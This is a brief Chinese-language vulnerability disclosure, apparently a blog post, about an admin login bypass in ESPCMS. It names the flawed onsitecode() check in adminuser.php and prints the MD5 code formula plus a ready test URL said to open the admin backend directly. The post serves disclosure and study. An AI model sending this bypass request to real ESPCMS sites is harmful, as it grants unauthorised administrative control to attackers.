ESPCMS 后台登陆绕过bug

时隔好久,童鞋相继发过这个CMS漏洞,今天大体看了下,问题还有,官方还是一直在修复漏洞。

问题出在后台文件adminsoft\control\adminuser.php文件

代码问题出在函数onsitecode()

只要$code == $codelist就通过验证,那么我们可以自己构造,主要就是
$codelist = md5($this->CON[‘sitecoedb’] . ‘_’ . $siteip . ‘_’ . adminfile);
测试代码如下
index.php?archive=adminuser&action=sitecode&adminid=admin&siteid=1&code=f01f70868bbd44aba6ffc8602367abea
直接访问登录后台。

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录